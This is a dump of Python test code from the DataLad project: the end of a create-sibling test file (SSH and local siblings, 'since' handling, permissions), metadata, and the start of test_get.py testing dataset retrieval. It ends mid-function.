ensure that nothing is created since since is used.\n # Also cover deprecation for since='' support. Takes just 60ms or so.\n # TODO: change or remove when removing since='' deprecation support\n out2 = assert_create_sshwebserver(\n name=remote_name,\n sshurl=sshurl,\n target_dir=target_dir_tpl,\n recursive=True,\n existing='skip',\n ui=have_webui(),\n since=''\n )\n assert_result_count(out2, 1, status='notneeded', sibling_name=remote_name)\n\n # so it was created on remote correctly and wasn't just skipped\n assert(Dataset(_path_(target_path_, ('prefix-' if flat else '') + sub3_name)).is_installed())\n push(dataset=source, to=remote_name, recursive=True, since='^') # just a smoke test\n\n\n# we are explicitly testing deprecated since='' inside\[email protected](\"ignore: 'since' should point to commitish\")\n@slow # 28 + 19sec on travis\ndef test_target_ssh_recursive():\n skip_if_on_windows()\n check_target_ssh_recursive(False)\n skip_ssh(check_target_ssh_recursive)(True)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef check_target_ssh_since(use_ssh, origin, src_path, target_path):\n _mk_submodule_annex(origin, 'test-annex.dat', 'whatever')\n\n if use_ssh:\n sshurl = \"ssh://datalad-test\" + target_path\n else:\n sshurl = target_path\n # prepare src\n source = install(src_path, source=origin, recursive=True)\n eq_(len(source.subdatasets()), 2)\n # get a new subdataset and make sure it is committed in the super\n source.create('brandnew')\n eq_(len(source.subdatasets()), 3)\n assert_repo_status(source.path)\n\n # and now we create a sibling for the new subdataset only\n assert_create_sshwebserver(\n name='dominique_carrera',\n dataset=source,\n sshurl=sshurl,\n recursive=True,\n since='HEAD~1')\n # there is one thing in the target directory only, and that is the\n # remote repo of the newly added subdataset\n\n target = Dataset(target_path)\n ok_(not target.is_installed()) # since we didn't create it due to since\n eq_(['brandnew'], os.listdir(target_path))\n\n # now test functionality if we add a subdataset with a subdataset\n brandnew2 = source.create('brandnew2')\n brandnewsub = brandnew2.create('sub')\n brandnewsubsub = brandnewsub.create('sub')\n # and now we create a sibling for the new subdataset only\n assert_create_sshwebserver(\n name='dominique_carrera',\n dataset=source,\n sshurl=sshurl,\n recursive=True,\n existing='skip')\n # verify that it created the immediate subdataset\n ok_(Dataset(_path_(target_path, 'brandnew2')).is_installed())\n # but not the subs since they were not saved, thus even push would not operate\n # on them yet, so no reason for us to create them until subdatasets are saved\n ok_(not Dataset(_path_(target_path, 'brandnew2/sub')).is_installed())\n\n source.save(recursive=True)\n\n # and if repeated now -- will create those sub/sub\n assert_create_sshwebserver(\n name='dominique_carrera',\n dataset=source,\n sshurl=sshurl,\n recursive=True,\n existing='skip')\n # verify that it created the immediate subdataset\n ok_(Dataset(_path_(target_path, 'brandnew2/sub')).is_installed())\n ok_(Dataset(_path_(target_path, 'brandnew2/sub/sub')).is_installed())\n\n # now we will try with --since while creating even deeper nested one, and ensuring\n # it is created -- see https://github.com/datalad/datalad/issues/6596\n brandnewsubsub.create('sub')\n source.save(recursive=True)\n # and now we create a sibling for the new subdataset only\n assert_create_sshwebserver(\n name='dominique_carrera',\n dataset=source,\n sshurl=sshurl,\n recursive=True,\n existing='skip',\n since=f'{DEFAULT_REMOTE}/{DEFAULT_BRANCH}')\n # verify that it created the sub and sub/sub\n ok_(Dataset(_path_(target_path, 'brandnew2/sub/sub/sub')).is_installed())\n\n # we installed without web ui - no hooks should be created/enabled\n assert_postupdate_hooks(_path_(target_path, 'brandnew'), installed=False)\n\n\n@slow # 10sec + ? on travis\ndef test_target_ssh_since():\n skip_if_on_windows()\n skip_ssh(check_target_ssh_since)(True)\n check_target_ssh_since(False)\n\n\n@skip_if_on_windows\n@skip_if_root\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef check_failon_no_permissions(use_ssh, src_path, target_path):\n if use_ssh:\n sshurl = \"ssh://datalad-test\" + opj(target_path, 'ds')\n else:\n sshurl = opj(target_path, 'ds')\n ds = Dataset(src_path).create()\n # remove user write permissions from target path\n chmod(target_path, stat.S_IREAD | stat.S_IEXEC)\n assert_raises(\n CommandError,\n ds.create_sibling,\n name='noperm',\n sshurl=sshurl)\n # restore permissions\n chmod(target_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)\n assert_create_sshwebserver(\n name='goodperm',\n dataset=ds,\n sshurl=sshurl)\n\n\ndef test_failon_no_permissions():\n skip_ssh(check_failon_no_permissions)(True)\n check_failon_no_permissions(False)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef check_replace_and_relative_sshpath(use_ssh, src_path, dst_path):\n # We need to come up with the path relative to our current home directory\n # https://github.com/datalad/datalad/issues/1653\n # but because we override HOME the HOME on the remote end would be\n # different even though a datalad-test. So we need to query it\n if use_ssh:\n from datalad import ssh_manager\n ssh = ssh_manager.get_connection('datalad-test')\n remote_home, err = ssh('pwd')\n remote_home = remote_home.rstrip('\\n')\n dst_relpath = os.path.relpath(dst_path, remote_home)\n url = 'datalad-test:%s' % dst_relpath\n sibname = 'datalad-test'\n else:\n url = dst_path\n sibname = 'local'\n\n ds = Dataset(src_path).create()\n create_tree(ds.path, {'sub.dat': 'lots of data'})\n ds.save('sub.dat')\n res = ds.create_sibling(url, ui=have_webui())\n assert_in_results(res, action=\"create_sibling\", sibling_name=sibname)\n published = ds.push(to=sibname, data='anything')\n assert_result_count(published, 1, path=opj(ds.path, 'sub.dat'))\n if have_webui():\n # verify that hook runs and there is nothing in stderr\n # since it exits with 0 exit even if there was a problem\n out = Runner(cwd=opj(dst_path, '.git')).run([_path_('hooks/post-update')],\n protocol=StdOutErrCapture)\n assert_false(out['stdout'])\n assert_false(out['stderr'])\n\n # Verify that we could replace and publish no problem\n # https://github.com/datalad/datalad/issues/1656\n # Strangely it spits outs IncompleteResultsError exception atm... so just\n # checking that it fails somehow\n res = ds.create_sibling(url, on_failure='ignore')\n assert_status('error', res)\n assert_in('already configured', res[0]['message'][0])\n # \"Settings\" such as UI do not persist, so we specify it again\n # for the test below depending on it\n with assert_raises(RuntimeError):\n # but we cannot replace in non-interactive mode\n ds.create_sibling(url, existing='replace', ui=have_webui())\n\n # We don't have context manager like @with_testsui, so\n @with_testsui(responses=[\"yes\"])\n def interactive_create_sibling():\n ds.create_sibling(url, existing='replace', ui=have_webui())\n interactive_create_sibling()\n\n published2 = ds.push(to=sibname, data='anything')\n assert_result_count(published2, 1, path=opj(ds.path, 'sub.dat'))\n\n # and one more test since in above test it would not puke ATM but just\n # not even try to copy since it assumes that file is already there\n create_tree(ds.path, {'sub2.dat': 'more data'})\n ds.save('sub2.dat')\n published3 = ds.push(to=sibname, data='nothing') # we publish just git\n assert_result_count(published3, 0, path=opj(ds.path, 'sub2.dat'))\n\n if not have_webui():\n return\n\n # now publish \"with\" data, which should also trigger the hook!\n # https://github.com/datalad/datalad/issues/1658\n from glob import glob\n\n from datalad.consts import WEB_META_LOG\n logs_prior = glob(_path_(dst_path, WEB_META_LOG, '*'))\n published4 = ds.push(to=sibname, data='anything')\n assert_result_count(published4, 1, path=opj(ds.path, 'sub2.dat'))\n logs_post = glob(_path_(dst_path, WEB_META_LOG, '*'))\n eq_(len(logs_post), len(logs_prior) + 1)\n\n assert_postupdate_hooks(dst_path)\n\n\n@slow # 14 + 10sec on travis\ndef test_replace_and_relative_sshpath():\n skip_if_on_windows()\n skip_ssh(check_replace_and_relative_sshpath)(True)\n check_replace_and_relative_sshpath(False)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(suffix=\"target\")\ndef _test_target_ssh_inherit(standardgroup, ui, use_ssh, src_path, target_path):\n ds = Dataset(src_path).create()\n if use_ssh:\n target_url = 'datalad-test:%s' % target_path\n else:\n target_url = target_path\n remote = \"magical\"\n # for the test of setting a group, will just smoke test while using current\n # user's group\n ds.create_sibling(target_url, name=remote, shared='group', group=os.getgid(), ui=ui) # not doing recursively\n if standardgroup:\n ds.repo.set_preferred_content('wanted', 'standard', remote)\n ds.repo.set_preferred_content('group', standardgroup, remote)\n ds.publish(to=remote)\n\n # now a month later we created a new subdataset... a few of the nested ones\n # A known hiccup happened when there\n # is also subsub ds added - we might incorrectly traverse and not prepare\n # sub first for subsub to inherit etc\n parent_ds = ds\n subdss = []\n nlevels = 2 # gets slow: 1 - 43 sec, 2 - 49 sec , 3 - 69 sec\n for levels in range(nlevels):\n subds = parent_ds.create('sub')\n create_tree(subds.path, {'sub.dat': 'lots of data'})\n parent_ds.save('sub', recursive=True)\n ok_file_under_git(subds.path, 'sub.dat', annexed=True)\n parent_ds = subds\n subdss.append(subds)\n\n target_subdss = [\n Dataset(opj(*([target_path] + ['sub'] * (i+1))))\n for i in range(nlevels)\n ]\n # since we do not have yet/thus have not used an option to record to publish\n # to that sibling by default (e.g. --set-upstream), if we run just ds.publish\n # -- should fail\n assert_result_count(\n ds.publish(on_failure='ignore'),\n 1,\n status='impossible',\n message='No target sibling configured for default publication, please specify via --to')\n ds.publish(to=remote) # should be ok, non recursive; BUT it (git or us?) would\n # create an empty sub/ directory\n assert_postupdate_hooks(target_path, installed=ui)\n for target_sub in target_subdss:\n ok_(not target_sub.is_installed()) # still not there\n res = ds.publish(to=remote, recursive=True, on_failure='ignore')\n assert_result_count(res, 1 + len(subdss))\n assert_status(('error', 'notneeded'), res)\n assert_result_count(\n res, len(subdss),\n status='error',\n message=(\"Unknown target sibling '%s' for publication\", 'magical'))\n\n # Finally publishing with inheritance\n ds.publish(to=remote, recursive=True, missing='inherit')\n assert_postupdate_hooks(target_path, installed=ui)\n\n def check_dss():\n # we added the remote and set all the\n for subds in subdss:\n eq_(subds.repo.get_preferred_content('wanted', remote), 'standard' if standardgroup else '')\n eq_(subds.repo.get_preferred_content('group', remote), standardgroup or '')\n\n for target_sub in target_subdss:\n ok_(target_sub.is_installed()) # it is there now\n eq_(target_sub.repo.config.get('core.sharedrepository'), '1')\n # and we have transferred the content\n if standardgroup and standardgroup == 'backup':\n # only then content should be copied\n ok_file_has_content(opj(target_sub.path, 'sub.dat'), 'lots of data')\n else:\n # otherwise nothing is copied by default\n assert_false(target_sub.repo.file_has_content('sub.dat'))\n\n check_dss()\n # and it should be ok to reconfigure the full hierarchy of datasets\n # while \"inheriting\". No URL must be specified, and we must not blow\n # but just issue a warning for the top level dataset which has no super,\n # so cannot inherit anything - use case is to fixup/establish the full\n # hierarchy on the remote site\n ds.save(recursive=True) # so we have committed hierarchy for create_sibling\n with swallow_logs(logging.WARNING) as cml:\n out = ds.create_sibling(\n None, name=remote, existing=\"reconfigure\", inherit=True,\n ui=ui, recursive=True)\n eq_(len(out), 1 + len(subdss))\n assert_in(\"Cannot determine super dataset\", cml.out)\n\n check_dss()\n\n\n@slow # 49 sec\ndef test_target_ssh_inherit():\n skip_if_on_windows() # create_sibling incompatible with win servers\n try:\n from datalad_deprecated.publish import Publish\n except ImportError:\n raise SkipTest('Test requires `publish()` from datalad-deprecated')\n # TODO: was waiting for resolution on\n # https://github.com/datalad/datalad/issues/1274\n # which is now closed but this one is failing ATM, thus leaving as TODO\n # _test_target_ssh_inherit(None) # no wanted etc\n # Takes too long so one will do with UI and another one without\n skip_ssh(_test_target_ssh_inherit)('manual', have_webui(), True) # manual -- no load should be annex copied\n _test_target_ssh_inherit('backup', False, False) # backup -- all data files\n\n\n@with_testsui(responses=[\"no\", \"yes\"])\n@with_tempfile(mkdir=True)\ndef check_exists_interactive(use_ssh, path):\n origin = Dataset(opj(path, \"origin\")).create()\n sibling_path = opj(path, \"sibling\")\n\n # Initiate sibling directory with \"stuff\"\n create_tree(sibling_path, {'stuff': ''})\n\n if use_ssh:\n sshurl = 'datalad-test:' + sibling_path\n else:\n sshurl = sibling_path\n\n # Should fail\n with assert_raises(RuntimeError):\n origin.create_sibling(sshurl)\n\n # Since first response is \"no\" - we should fail here again:\n with assert_raises(RuntimeError):\n origin.create_sibling(sshurl, existing='replace')\n # and there should be no initiated repository\n assert not Dataset(sibling_path).is_installed()\n # But we would succeed on the 2nd try, since answer will be yes\n origin.create_sibling(sshurl, existing='replace')\n assert Dataset(sibling_path).is_installed()\n # And with_testsui should not fail with \"Unused responses left\"\n\n\ndef test_check_exists_interactive():\n skip_if_on_windows()\n skip_ssh(check_exists_interactive)(True)\n check_exists_interactive(False)\n\n\n@skip_if_on_windows\n@with_tempfile(mkdir=True)\ndef test_local_relpath(path=None):\n path = Path(path)\n ds_main = Dataset(path / \"main\").create()\n ds_main.create(\"subds\")\n\n ds_main.create_sibling(\n name=\"relpath-bound\", recursive=True,\n sshurl=os.path.relpath(str(path / \"a\"), ds_main.path))\n ok_((path / \"a\" / \"subds\").exists())\n\n with chpwd(path):\n create_sibling(\n dataset=ds_main.path,\n name=\"relpath-unbound\", recursive=True,\n sshurl=\"b\")\n ok_((path / \"b\" / \"subds\").exists())\n\n with chpwd(ds_main.path):\n create_sibling(\n name=\"relpath-unbound-dsnone\", recursive=True,\n sshurl=os.path.relpath(str(path / \"c\"), ds_main.path))\n ok_((path / \"c\" / \"subds\").exists())\n\n\n@skip_if_on_windows\n@with_tempfile(mkdir=True)\ndef test_local_path_target_dir(path=None):\n path = Path(path)\n ds_main = Dataset(path / \"main\").create()\n\n ds_main.create_sibling(\n name=\"abspath-targetdir\",\n sshurl=str(path / \"a\"), target_dir=\"tdir\")\n ok_((path / \"a\" / \"tdir\").exists())\n\n ds_main.create_sibling(\n name=\"relpath-bound-targetdir\",\n sshurl=os.path.relpath(str(path / \"b\"), ds_main.path),\n target_dir=\"tdir\")\n ok_((path / \"b\" / \"tdir\").exists())\n\n with chpwd(path):\n create_sibling(\n dataset=ds_main.path,\n name=\"relpath-unbound-targetdir\",\n sshurl=\"c\", target_dir=\"tdir\")\n ok_((path / \"c\" / \"tdir\").exists())\n\n ds_main.create(\"subds\")\n\n ds_main.create_sibling(\n name=\"rec-plain-targetdir\", recursive=True,\n sshurl=str(path / \"d\"), target_dir=\"tdir\")\n ok_((path / \"d\" / \"tdir\" / \"subds\").exists())\n\n ds_main.create_sibling(\n name=\"rec-template-targetdir\", recursive=True,\n sshurl=str(path / \"e\"), target_dir=\"d%RELNAME\")\n ok_((path / \"e\" / \"d\").exists())\n ok_((path / \"e\" / \"d-subds\").exists())\n\n\n@slow # 12sec on Yarik's laptop\n@skip_if_on_windows # create_sibling incompatible with win servers\n@skip_ssh\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_non_master_branch(src_path=None, target_path=None):\n src_path = Path(src_path)\n target_path = Path(target_path)\n\n ds_a = Dataset(src_path).create()\n # Rename rather than checking out another branch so that the default branch\n # doesn't exist in any state.\n ds_a.repo.call_git([\"branch\", \"-m\", DEFAULT_BRANCH, \"other\"])\n (ds_a.pathobj / \"afile\").write_text(\"content\")\n sa = ds_a.create(\"sub-a\")\n sa.repo.checkout(\"other-sub\", [\"-b\"])\n ds_a.create(\"sub-b\")\n\n ds_a.save()\n ds_a.create_sibling(\n name=\"sib\", recursive=True,\n sshurl=\"ssh://datalad-test\" + str(target_path / \"b\"))\n ds_a.push(to=\"sib\", data=\"anything\")\n\n ds_b = Dataset(target_path / \"b\")\n\n def get_branch(repo):\n return repo.get_corresponding_branch() or repo.get_active_branch()\n\n # The HEAD for the create-sibling matches what the branch was in\n # the original repo.\n eq_(get_branch(ds_b.repo), \"other\")\n ok_((ds_b.pathobj / \"afile\").exists())\n\n eq_(get_branch(Dataset(target_path / \"b\" / \"sub-a\").repo),\n \"other-sub\")\n eq_(get_branch(Dataset(target_path / \"b\" / \"sub-b\").repo),\n DEFAULT_BRANCH)\n\n\n@known_failure_windows # https://github.com/datalad/datalad/issues/5287\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_preserve_attrs(src=None, dest=None):\n create_tree(src, {\"src\": {\"foo\": {\"bar\": \"This is test text.\"}}})\n os.utime(opj(src, \"src\", \"foo\", \"bar\"), (1234567890, 1234567890))\n _RunnerAdapter().put(opj(src, \"src\"), dest, recursive=True, preserve_attrs=True)\n s = os.stat(opj(dest, \"src\", \"foo\", \"bar\"))\n assert s.st_atime == 1234567890\n assert s.st_mtime == 1234567890\n with open(opj(dest, \"src\", \"foo\", \"bar\")) as fp:\n assert fp.read() == \"This is test text.\"\n\n\n@known_failure_windows # backstory: https://github.com/datalad/datalad/pull/7265\n@with_tempfile(mkdir=True)\ndef test_only_one_level_without_recursion(path=None):\n # this tests for https://github.com/datalad/datalad/issues/5614: accidental\n # recursion of one level by default\n path = Path(path)\n ds_main = Dataset(path / \"main\").create()\n ds_main.create('sub1')\n\n ds_main.create_sibling(\n name=\"dummy\",\n sshurl=str(path / \"toplevelsibling\"))\n # this should exist\n ok_((path / 'toplevelsibling').exists())\n # this shouldn't\n assert_false(Path(path / 'toplevelsibling' / 'sub1').exists())\n" }, { "alpha_fraction": 0.6176891326904297, "alphanum_fraction": 0.6269170641899109, "avg_line_length": 36.30424118041992, "blob_id": "6106c41e92d024628579689129458735506d8a3f", "content_id": "4593c5cd42f603a7e393e6c84069c848ad57bf16", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30776, "license_type": "permissive", "max_line_length": 113, "num_lines": 825, "path": "/datalad/distribution/tests/test_get.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test get action\n\n\"\"\"\n\nfrom os import curdir\nfrom os.path import basename\nfrom os.path import join as opj\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad.api import (\n clone,\n create,\n get,\n install,\n)\nfrom datalad.distribution.get import (\n _get_flexible_source_candidates_for_submodule,\n)\nfrom datalad.interface.results import only_matching_paths\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n InsufficientArgumentsError,\n RemoteNotAvailableError,\n)\nfrom datalad.support.network import get_local_file_url\nfrom datalad.tests.utils_testdatasets import (\n _make_dataset_hierarchy,\n _mk_submodule_annex,\n)\nfrom datalad.tests.utils_pytest import (\n create_tree,\n assert_false,\n assert_raises,\n assert_in,\n assert_status,\n assert_in_results,\n assert_not_in_results,\n assert_repo_status,\n assert_result_count,\n assert_message,\n DEFAULT_REMOTE,\n eq_,\n known_failure_windows,\n known_failure_githubci_win,\n ok_,\n serve_path_via_http,\n skip_if_adjusted_branch,\n skip_ssh,\n skip_if_on_windows,\n slow,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n rmtree,\n with_pathsep,\n)\n\nfrom ..dataset import Dataset\n\n\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_get_flexible_source_candidates_for_submodule(t=None, t2=None, t3=None):\n f = _get_flexible_source_candidates_for_submodule\n # for now without mocking -- let's just really build a dataset\n ds = create(t)\n sub = ds.create('sub')\n clone = install(\n t2, source=t,\n result_xfm='datasets', return_type='item-or-list')\n\n # first one could just know about itself or explicit url provided\n sshurl = 'ssh://e.c'\n httpurl = 'http://e.c'\n ds_subpath = str(ds.pathobj / 'sub')\n eq_(f(ds, dict(path=ds_subpath, parentds=ds.path)), [])\n eq_(f(ds, dict(path=ds_subpath, parentds=ds.path, gitmodule_url=sshurl)),\n [dict(cost=900, name='local', url=sshurl)])\n eq_(f(ds, dict(path=ds_subpath, parentds=ds.path, gitmodule_url=httpurl)),\n [dict(cost=900, name='local', url=httpurl)])\n\n # but if we work on dsclone then it should also add urls deduced from its\n # own location default remote for current branch\n clone_subpath = str(clone.pathobj / 'sub')\n eq_(f(clone, dict(path=clone_subpath, parentds=clone.path)),\n [dict(cost=650, name=DEFAULT_REMOTE, url=ds_subpath)])\n eq_(f(clone, dict(path=clone_subpath, parentds=clone.path, gitmodule_url=sshurl)),\n [dict(cost=600, name=DEFAULT_REMOTE, url=sshurl),\n dict(cost=650, name=DEFAULT_REMOTE, url=ds_subpath)])\n eq_(f(clone, dict(path=clone_subpath, parentds=clone.path, gitmodule_url=httpurl)),\n [dict(cost=600, name=DEFAULT_REMOTE, url=httpurl),\n dict(cost=650, name=DEFAULT_REMOTE, url=ds_subpath)])\n\n # make sure it does meaningful things in an actual clone with an actual\n # record of a subdataset\n clone_subpath = str(clone.pathobj / 'sub')\n eq_(f(clone, clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n ])\n\n # check that a configured remote WITHOUT the desired submodule commit\n # does not show up as a candidate\n clone.siblings('add', name='myremote', url='http://example.com',\n result_renderer='disabled')\n eq_(f(clone, clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n ])\n # inject a source URL config, should alter the result accordingly\n with patch.dict(\n 'os.environ',\n {'DATALAD_GET_SUBDATASET__SOURCE__CANDIDATE__BANG': 'youredead'}):\n eq_(f(clone, clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n dict(cost=700, name='bang', url='youredead', from_config=True),\n ])\n # we can alter the cost by given the name a two-digit prefix\n with patch.dict(\n 'os.environ',\n {'DATALAD_GET_SUBDATASET__SOURCE__CANDIDATE__400BANG': 'youredead'}):\n eq_(f(clone, clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=400, name='bang', url='youredead', from_config=True),\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n ])\n # verify template instantiation works\n with patch.dict(\n 'os.environ',\n {'DATALAD_GET_SUBDATASET__SOURCE__CANDIDATE__BANG': 'pre-{id}-post'}):\n eq_(f(clone, clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n dict(cost=700, name='bang', url='pre-{}-post'.format(sub.id),\n from_config=True),\n ])\n # template using the \"regular\" property `path` (`id` above is shortened from\n # actual record `datalad-id` in .gitmodules)\n with patch.dict(\n 'os.environ',\n {'DATALAD_GET_SUBDATASET__SOURCE__CANDIDATE__BANG': 'somewhe.re/{path}'}):\n eq_(f(clone, clone.subdatasets(return_type='item-or-list')),\n [\n dict(cost=600, name=DEFAULT_REMOTE, url=ds_subpath),\n dict(cost=700, name='bang', url='somewhe.re/sub',\n from_config=True),\n ])\n\n # now again, but have an additional remote besides origin that\n # actually has the relevant commit\n clone3 = install(\n t3, source=t2,\n result_xfm='datasets', return_type='item-or-list')\n clone3.siblings('add', name='myremote', url=ds.path,\n result_renderer='disabled')\n clone3.update(sibling='myremote')\n # we should end up with this additional piece\n # we are not checking for the name of the remote, because it is actually\n # registered under two different names\n assert_in(\n ds_subpath,\n [i['url']\n for i in f(clone3, clone3.subdatasets(return_type='item-or-list'))]\n )\n\n # check #5839: two source configs with the same name should raise an error\n clone3.config.add(\n f\"datalad.get.subdataset-source-candidate-{DEFAULT_REMOTE}\",\n \"should-not-work\"\n )\n clone3.config.add(\n f\"datalad.get.subdataset-source-candidate-{DEFAULT_REMOTE}\",\n \"should-really-not-work\"\n )\n assert_raises(ValueError, clone3.get, 'sub')\n\n # smoke test to check for #5631: We shouldn't crash with a KeyError when a\n # template can not be matched. Origin: https://github.com/datalad/datalad/pull/5644/files\n with patch.dict(\n 'os.environ',\n {'DATALAD_GET_SUBDATASET__SOURCE__CANDIDATE__BANG': 'pre-{not-a-key}-post'}):\n f(clone, clone.subdatasets(return_type='item-or-list'))\n\n # TODO: check that http:// urls for the dataset itself get resolved\n # TODO: many more!!\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(content=\"doesntmatter\")\ndef test_get_invalid_call(path=None, file_outside=None):\n\n # no argument at all:\n assert_raises(InsufficientArgumentsError, get, None)\n assert_raises(InsufficientArgumentsError, get, [])\n # invalid dataset:\n assert_raises(ValueError, get, None, dataset=path, on_failure='ignore')\n\n # have a plain git:\n ds = Dataset(path)\n ds.create(annex=False)\n with open(opj(path, \"some.txt\"), \"w\") as f:\n f.write(\"whatever\")\n ds.save(\"some.txt\", to_git=True, message=\"Initial commit.\")\n\n # make it an annex (remove indicator file that create has placed\n # in the dataset to make it possible):\n (ds.pathobj / '.noannex').unlink()\n AnnexRepo(path, init=True, create=True)\n # call get again on a file in git:\n result = ds.get(\"some.txt\")\n assert_status('notneeded', result)\n\n # invalid source:\n # yoh: but now we would need to add it to annex since clever code first\n # checks what needs to be fetched at all\n create_tree(path, {'annexed.dat': 'some'})\n ds.save(\"annexed.dat\")\n ds.repo.drop(\"annexed.dat\", options=['--force'])\n with assert_raises(RemoteNotAvailableError) as cme:\n ds.get(\"annexed.dat\", source='MysteriousRemote')\n eq_(\"MysteriousRemote\", cme.value.remote)\n\n res = ds.get(\"NotExistingFile.txt\", on_failure='ignore')\n assert_status('impossible', res)\n assert_message(\"path does not exist\", res)\n\n # path outside repo errors as with most other commands:\n res = ds.get(file_outside, on_failure='ignore', result_renderer='default')\n assert_in_results(\n res, status='error',\n message=('path not associated with dataset %s', ds))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_single_file(src=None, path=None):\n ca = dict(result_renderer='disabled')\n test_fname = 'test-annex.dat'\n orig = Dataset(src).create(**ca)\n (orig.pathobj / test_fname).write_text('some')\n orig.save(**ca)\n\n ds = clone(src, path, **ca)\n ok_(ds.is_installed())\n ok_(ds.repo.file_has_content('test-annex.dat') is False)\n result = ds.get(\"test-annex.dat\", **ca)\n assert_result_count(result, 1)\n assert_status('ok', result)\n eq_(result[0]['path'], opj(ds.path, 'test-annex.dat'))\n annexprops = ds.repo.get_file_annexinfo('test-annex.dat',\n eval_availability=True)\n eq_(result[0]['annexkey'], annexprops['key'])\n ok_(annexprops['has_content'])\n\n\[email protected](\"override\", [False, True])\n@with_tempfile(mkdir=True)\ndef test_get_subdataset_inherit_reckless(path=None, *, override):\n src = Dataset(opj(path, \"a\")).create()\n src_subds = src.create(\"sub\")\n src_subds.create(\"subsub\")\n src.save(recursive=True)\n\n clone = install(opj(path, \"b\"), source=src, reckless=\"auto\",\n result_xfm=\"datasets\", return_type=\"item-or-list\")\n clone_sub = Dataset(clone.pathobj / \"sub\")\n assert_false(clone_sub.is_installed())\n clone_subsub = Dataset(clone.pathobj / \"sub\" / \"subsub\")\n\n clone.get(opj(\"sub\", \"subsub\"), reckless=False if override else None)\n ok_(clone_sub.is_installed())\n ok_(clone_subsub.is_installed())\n\n for sub in [clone_sub, clone_subsub]:\n eq_(sub.config.get(\"datalad.clone.reckless\", None),\n None if override else \"auto\")\n eq_(sub.config.get(\"annex.hardlink\", None),\n None if override else \"true\")\n\n\n@with_tree(tree={'file1.txt': 'whatever 1',\n 'file2.txt': 'whatever 2',\n 'file3.txt': 'whatever 3',\n 'file4.txt': 'whatever 4'})\n@serve_path_via_http\n@with_tempfile(mkdir=True)\ndef test_get_multiple_files(path=None, url=None, ds_dir=None):\n from os import listdir\n\n from datalad.support.network import RI\n\n file_list = [f for f in listdir(path) if not f.startswith('.')]\n\n # prepare urls:\n [RI(url + f) for f in file_list]\n\n # prepare origin\n origin = Dataset(path).create(force=True)\n origin.save(file_list, message=\"initial\")\n\n ds = install(\n ds_dir, source=path,\n result_xfm='datasets', return_type='item-or-list')\n\n # no content present:\n ok_(not any(ds.repo.file_has_content(file_list)))\n\n # get two plus an invalid one:\n result = ds.get(['file1.txt', 'file2.txt', 'not_existing.txt'],\n on_failure='ignore')\n assert_status('impossible', [result[0]])\n assert_status(['ok', 'notneeded'], result[1:])\n # explicitly given not existing file was skipped:\n # (see test_get_invalid_call)\n eq_(set([basename(item.get('path')) for item in result[1:]]),\n {'file1.txt', 'file2.txt'})\n ok_(all(ds.repo.file_has_content(['file1.txt', 'file2.txt'])))\n\n # get all of them:\n result = ds.get(curdir)\n # there were two files left to get:\n eq_(set([basename(item.get('path')) for item in result if item['type'] == 'file']),\n {'file3.txt', 'file4.txt'})\n ok_(all(ds.repo.file_has_content(file_list)))\n\n\n@with_tree(tree={'file1.txt': 'something',\n 'subdir': {'file2.txt': 'something else',\n 'subsubdir': {\n 'file3.txt': 'something completely different',\n 'file4.txt': 'something'\n }}})\n@with_tempfile(mkdir=True)\ndef test_get_recurse_dirs(o_path=None, c_path=None):\n\n # prepare source:\n origin = Dataset(o_path).create(force=True)\n origin.save()\n\n ds = install(\n c_path, source=o_path,\n result_xfm='datasets', return_type='item-or-list')\n\n file_list = ['file1.txt',\n opj('subdir', 'file2.txt'),\n opj('subdir', 'subsubdir', 'file3.txt'),\n opj('subdir', 'subsubdir', 'file4.txt')]\n files_in_sub = [f for f in file_list if f.startswith(with_pathsep('subdir'))]\n\n # no content present:\n ok_(not any(ds.repo.file_has_content(file_list)))\n\n result = ds.get('subdir')\n # check result:\n assert_status('ok', result)\n eq_(set([item.get('path')[len(ds.path) + 1:] for item in result\n if item['type'] == 'file']),\n set(files_in_sub))\n # we also get one report on the subdir\n eq_(len(result) - 1, len(files_in_sub))\n\n # got all files beneath subdir:\n ok_(all(ds.repo.file_has_content(files_in_sub)))\n\n # additionally got file1.txt silently, since it has the same content as\n # subdir/subsubdir/file4.txt:\n ok_(ds.repo.file_has_content('file1.txt') is True)\n\n\n@slow # 15.1496s\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_get_recurse_subdatasets(src=None, path=None):\n _mk_submodule_annex(src, 'test-annex.dat', 'irrelevant')\n\n ds = clone(\n src, path,\n result_xfm='datasets', return_type='item-or-list')\n\n # ask for the two subdatasets specifically. This will obtain them,\n # but not any content of any files in them\n subds1, subds2 = ds.get(['subm 1', '2'], get_data=False,\n description=\"youcouldnotmakethisup\",\n result_xfm='datasets')\n for d in (subds1, subds2):\n 